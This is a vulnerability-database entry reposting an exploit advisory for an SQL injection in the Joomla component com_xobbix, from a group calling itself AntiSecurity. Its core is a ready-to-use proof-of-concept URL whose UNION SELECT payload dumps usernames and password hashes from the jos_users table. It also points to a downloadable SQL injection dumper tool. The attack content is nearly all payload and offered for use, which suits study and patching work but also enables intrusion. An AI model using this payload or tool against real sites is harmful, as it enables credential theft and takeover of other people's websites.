Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtAntiSecurity1337DAY-ID-11660
HistoryApr 06, 2010 - 12:00 a.m.

Joomla Component com_xobbix SQL Injection Vulnerability

2010-04-0600:00:00
AntiSecurity
0day.today
18
JSON

Exploit for php platform in category web applications

=======================================================
Joomla Component com_xobbix SQL Injection Vulnerability
=======================================================

===============================================================================================================
 
 
  [o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability
  
       Software : com_xobbix version 1.0.x
       Vendor   : http://www.php-shop-system.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
===============================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
 
 
  [o] Tool
 
       Simple SQLi Dumper v5.1
       http://c0li.info/xpl/ssdp51.tar.gz
       http://evilc0de.blogspot.com/2010/03/simple-sqli-dumper-v51-how-to.html
 
 
===============================================================================================================



#  0day.today [2018-03-12]  #
JSON